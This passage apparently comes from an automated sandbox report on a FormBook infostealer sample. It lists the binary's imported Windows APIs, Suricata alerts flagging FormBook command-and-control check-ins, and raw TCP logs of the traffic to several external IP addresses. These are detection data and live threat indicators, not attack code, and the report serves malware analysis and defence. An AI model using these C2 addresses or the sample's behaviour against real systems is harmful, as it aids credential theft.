                                                                RT_GROUP_ICON0x122fd80x14dataEnglishGreat Britain1.15
                                                                RT_GROUP_ICON0x122fec0x14dataEnglishGreat Britain1.25
                                                                RT_VERSION0x1230000xdcdataEnglishGreat Britain0.6181818181818182
                                                                RT_MANIFEST0x1230dc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                Imports

                                                                DLLImport
                                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                UxTheme.dllIsThemeActive
                                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishGreat Britain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-27T08:53:45.960450+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649777161.97.168.24580TCP
                                                                2024-11-27T08:53:45.960450+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649777161.97.168.24580TCP
                                                                2024-11-27T08:54:03.235909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64981927.124.4.24680TCP
                                                                2024-11-27T08:54:05.907848+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64982427.124.4.24680TCP
                                                                2024-11-27T08:54:08.595417+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64983127.124.4.24680TCP
                                                                2024-11-27T08:54:11.282791+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64983827.124.4.24680TCP
                                                                2024-11-27T08:54:11.282791+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64983827.124.4.24680TCP
                                                                2024-11-27T08:54:19.223732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649858149.88.81.19080TCP
                                                                2024-11-27T08:54:21.892239+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649865149.88.81.19080TCP
                                                                2024-11-27T08:54:24.564197+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649872149.88.81.19080TCP
                                                                2024-11-27T08:54:47.655968+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649878149.88.81.19080TCP
                                                                2024-11-27T08:54:47.655968+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649878149.88.81.19080TCP
                                                                2024-11-27T08:54:55.411834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64994485.159.66.9380TCP
                                                                2024-11-27T08:54:58.079931+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995085.159.66.9380TCP
                                                                2024-11-27T08:55:00.751872+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995885.159.66.9380TCP
                                                                2024-11-27T08:55:03.326014+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64996685.159.66.9380TCP
                                                                2024-11-27T08:55:03.326014+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64996685.159.66.9380TCP
                                                                2024-11-27T08:55:10.226446+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649983185.27.134.14480TCP
                                                                2024-11-27T08:55:12.937312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990185.27.134.14480TCP
                                                                2024-11-27T08:55:15.611282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997185.27.134.14480TCP
                                                                2024-11-27T08:55:18.327397+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650003185.27.134.14480TCP
                                                                2024-11-27T08:55:18.327397+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650003185.27.134.14480TCP
                                                                2024-11-27T08:55:25.329251+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006172.67.145.23480TCP
                                                                2024-11-27T08:55:28.178587+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007172.67.145.23480TCP
                                                                2024-11-27T08:55:30.870401+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008172.67.145.23480TCP
                                                                2024-11-27T08:55:33.466810+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650009172.67.145.23480TCP
                                                                2024-11-27T08:55:33.466810+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650009172.67.145.23480TCP
                                                                2024-11-27T08:55:40.464204+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010172.67.167.14680TCP
                                                                2024-11-27T08:55:43.124581+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011172.67.167.14680TCP
                                                                2024-11-27T08:55:45.948010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650012172.67.167.14680TCP
                                                                2024-11-27T08:55:48.702630+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650013172.67.167.14680TCP
                                                                2024-11-27T08:55:48.702630+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013172.67.167.14680TCP
                                                                2024-11-27T08:55:55.802009+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650014154.88.22.10180TCP
                                                                2024-11-27T08:55:58.471009+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650015154.88.22.10180TCP
                                                                2024-11-27T08:56:01.142486+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650016154.88.22.10180TCP
                                                                2024-11-27T08:56:03.874999+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650017154.88.22.10180TCP
                                                                2024-11-27T08:56:03.874999+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650017154.88.22.10180TCP
                                                                2024-11-27T08:56:10.717750+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650019209.74.77.10780TCP
                                                                2024-11-27T08:56:13.425645+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650020209.74.77.10780TCP
                                                                2024-11-27T08:56:16.168443+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650021209.74.77.10780TCP
                                                                2024-11-27T08:56:18.770935+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650022209.74.77.10780TCP
                                                                2024-11-27T08:56:18.770935+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650022209.74.77.10780TCP
                                                                2024-11-27T08:56:34.006573+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023104.21.34.10380TCP
                                                                2024-11-27T08:56:36.721112+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025104.21.34.10380TCP
                                                                2024-11-27T08:56:39.338499+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026104.21.34.10380TCP
                                                                2024-11-27T08:56:42.065647+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650027104.21.34.10380TCP
                                                                2024-11-27T08:56:42.065647+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650027104.21.34.10380TCP
                                                                2024-11-27T08:56:51.697619+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002820.2.249.780TCP
                                                                2024-11-27T08:56:54.376808+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002920.2.249.780TCP
                                                                2024-11-27T08:56:57.065492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003020.2.249.780TCP
                                                                2024-11-27T08:56:59.824152+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003120.2.249.780TCP
                                                                2024-11-27T08:56:59.824152+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003120.2.249.780TCP
                                                                2024-11-27T08:57:07.048896+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650032156.251.17.22480TCP
                                                                2024-11-27T08:57:09.720988+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650033156.251.17.22480TCP
                                                                2024-11-27T08:57:12.400972+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650034156.251.17.22480TCP
                                                                2024-11-27T08:57:16.023931+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650035156.251.17.22480TCP
                                                                2024-11-27T08:57:16.023931+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650035156.251.17.22480TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 27, 2024 08:53:44.592991114 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:44.712991953 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:44.713099957 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:44.728030920 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:44.847989082 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:45.960243940 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:45.960347891 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:45.960359097 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:45.960370064 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:45.960449934 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:45.960453033 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:53:45.960485935 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:45.960485935 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:45.965959072 CET4977780192.168.2.6161.97.168.245
                                                                Nov 27, 2024 08:53:46.176646948 CET8049777161.97.168.245192.168.2.6
                                                                Nov 27, 2024 08:54:01.706984043 CET4981980192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:01.826987028 CET804981927.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:01.827074051 CET4981980192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:01.844566107 CET4981980192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:01.964602947 CET804981927.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:03.190831900 CET804981927.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:03.235908985 CET4981980192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:03.360940933 CET4981980192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:03.383091927 CET804981927.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:03.383177996 CET4981980192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:04.381131887 CET4982480192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:04.501040936 CET804982427.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:04.501136065 CET4982480192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:04.517178059 CET4982480192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:04.637198925 CET804982427.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:05.865360975 CET804982427.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:05.907847881 CET4982480192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:06.032901049 CET4982480192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:06.057730913 CET804982427.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:06.059375048 CET4982480192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:07.052799940 CET4983180192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:07.172790051 CET804983127.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:07.172935009 CET4983180192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:07.195000887 CET4983180192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:07.314953089 CET804983127.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:07.315009117 CET804983127.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:08.549874067 CET804983127.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:08.595417023 CET4983180192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:08.704772949 CET4983180192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:08.729079962 CET804983127.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:08.729171038 CET4983180192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:09.723958015 CET4983880192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:09.843899012 CET804983827.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:09.844099045 CET4983880192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:09.854370117 CET4983880192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:09.974365950 CET804983827.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:11.242377996 CET804983827.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:11.282790899 CET4983880192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:11.443891048 CET804983827.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:11.444046021 CET4983880192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:11.444958925 CET4983880192.168.2.627.124.4.246
                                                                Nov 27, 2024 08:54:11.564827919 CET804983827.124.4.246192.168.2.6
                                                                Nov 27, 2024 08:54:17.570583105 CET4985880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:17.690583944 CET8049858149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:17.690746069 CET4985880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:17.709693909 CET4985880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:17.829786062 CET8049858149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:19.223731995 CET4985880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:19.384321928 CET8049858149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:20.239805937 CET4986580192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:20.359766006 CET8049865149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:20.359888077 CET4986580192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:20.384290934 CET4986580192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:20.504190922 CET8049865149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:21.892239094 CET4986580192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:22.052341938 CET8049865149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:22.911309004 CET4987280192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:23.031177998 CET8049872149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:23.031254053 CET4987280192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:23.048840046 CET4987280192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:23.168849945 CET8049872149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:23.168948889 CET8049872149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:24.564197063 CET4987280192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:24.728452921 CET8049872149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:25.583220959 CET4987880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:25.703959942 CET8049878149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:25.705960989 CET4987880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:25.716041088 CET4987880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:25.836002111 CET8049878149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:39.670140982 CET8049858149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:39.670229912 CET4985880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:42.342247009 CET8049865149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:42.342318058 CET4986580192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:44.982881069 CET8049872149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:44.982944965 CET4987280192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:47.654768944 CET8049878149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:47.655967951 CET4987880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:47.656785965 CET4987880192.168.2.6149.88.81.190
                                                                Nov 27, 2024 08:54:47.776652098 CET8049878149.88.81.190192.168.2.6
                                                                Nov 27, 2024 08:54:53.755791903 CET4994480192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:53.875852108 CET804994485.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:53.879910946 CET4994480192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:53.895574093 CET4994480192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:54.016257048 CET804994485.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:55.411834002 CET4994480192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:55.532154083 CET804994485.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:55.536609888 CET4994480192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:56.427891016 CET4995080192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:56.548105001 CET804995085.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:56.548214912 CET4995080192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:56.577236891 CET4995080192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:56.697145939 CET804995085.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:58.079931021 CET4995080192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:58.200289011 CET804995085.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:58.203887939 CET4995080192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:59.098848104 CET4995880192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:59.218873978 CET804995885.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:59.218966007 CET4995880192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:59.237972975 CET4995880192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:54:59.358009100 CET804995885.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:54:59.358043909 CET804995885.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:00.751872063 CET4995880192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:00.872155905 CET804995885.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:00.872205973 CET4995880192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:01.771801949 CET4996680192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:01.891805887 CET804996685.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:01.892184019 CET4996680192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:01.903806925 CET4996680192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:02.023916960 CET804996685.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:03.325696945 CET804996685.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:03.325833082 CET804996685.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:03.326014042 CET4996680192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:03.328674078 CET4996680192.168.2.685.159.66.93
                                                                Nov 27, 2024 08:55:03.448554993 CET804996685.159.66.93192.168.2.6
                                                                Nov 27, 2024 08:55:08.856110096 CET4998380192.168.2.6185.27.134.144
